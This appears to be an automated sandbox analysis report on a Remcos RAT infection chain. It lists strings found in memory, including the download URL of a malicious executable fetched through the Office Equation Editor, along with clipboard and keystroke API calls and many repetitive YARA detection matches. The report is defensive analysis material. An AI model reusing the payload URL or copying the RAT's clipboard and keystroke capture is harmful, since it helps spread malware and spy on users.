              Source: outvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, outvaunts.exe, 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exe
              Source: EQNEDT32.EXE, 00000002.00000002.456215028.00000000035C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exej
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exek
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000063F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/HKP098767890HJ.exessC:
              Source: EQNEDT32.EXE, 00000002.00000002.456047137.000000000066B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.grupodulcemar.pe/m
              Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknownHTTPS traffic detected: 161.132.57.101:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00874164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00874164
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00874164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00874164
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013D4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_013D4164
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00873F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,5_2_00873F66
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,5_2_0086001C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0088CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_0088CABC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013ECABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_013ECABC
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
